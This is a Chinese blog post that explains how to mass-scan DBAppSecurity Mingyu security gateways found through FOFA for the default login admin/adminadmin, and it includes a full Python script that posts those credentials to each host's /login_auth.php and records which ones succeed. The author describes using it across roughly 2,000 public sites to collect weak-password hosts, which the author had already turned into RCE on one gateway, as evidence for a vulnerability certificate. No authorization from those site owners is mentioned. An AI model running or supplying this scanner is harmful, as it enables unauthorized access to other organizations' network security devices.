fofaviewer+python批量扫描弱口令

最近在一次授权内网渗透过程中,发现内网存在安恒的明御安全网关,并且在朋友的帮助下成功进入后台,弱口令进入后台,后台功能十分熟悉,在很多厂商的网关里见过,就随手打了一个poc,好了rce了,于是便有了混个证的想法。但是十个弱口令进后台的网站可难住我了,fofa了一下有2000多个站点,试了十几个就一个弱口令,于是便有了此文,关于fofaviewer+python批量扫描弱口令。脚本只为实现简单的功能大佬轻喷。




image

fofaviewer自行去github下载。

python脚本如下

import requests
from requests.packages import urllib3


def requests_form(urls):
    url = urls + '/login_auth.php'
    urla = urls + '/login/login.html'
    headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
               'Referer': urla,
               'Origin': urls}
    data = {'user': 'admin', 'pwd': 'adminadmin'}
    urllib3.disable_warnings()
    response = requests.post(url, data, headers, verify=False,timeout=2)
    # print(response.text)
    if '\"code\":\"1\"' in response.text:
        print('弱口令存在')
        # print(response.text)
        with open('1.txt', 'a', encoding='utf-8') as file:
            file.write(list[i]+" exist")
    else:
        print('弱口令不存在')
    return response

if __name__ == "__main__":
    file = open("url.txt", "r")
    list = file.readlines()
    i = 0
    for number in list:
        if 'https' in number:
            a=1
        else:
            list[i] = 'https://' + number
        if i == len(list):
            continue
        print(list[i])
        list[i] = list[i].replace('\n', '')
        try:
            response = requests_form(list[i])
        except:
            print('It is wrong')
        i = i + 1

脚本介绍
image
总共有三种回显,弱口令存在,不存在,以及wrong
其中,只有弱口令存在时,目标地址和exist标识写入了1.txt
image

至于fofaviewer
image
搜索后导出,复制链接到url.txt里,然后拖到python脚本所在路径即可

posted @   LinkPoc  阅读(695)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 新年开篇:在本地部署DeepSeek大模型实现联网增强的AI应用
· DeepSeek火爆全网,官网宕机?本地部署一个随便玩「LLM探索」
· Janus Pro:DeepSeek 开源革新,多模态 AI 的未来
· 上周热点回顾(1.20-1.26)
· 【译】.NET 升级助手现在支持升级到集中式包管理
点击右上角即可分享
微信分享提示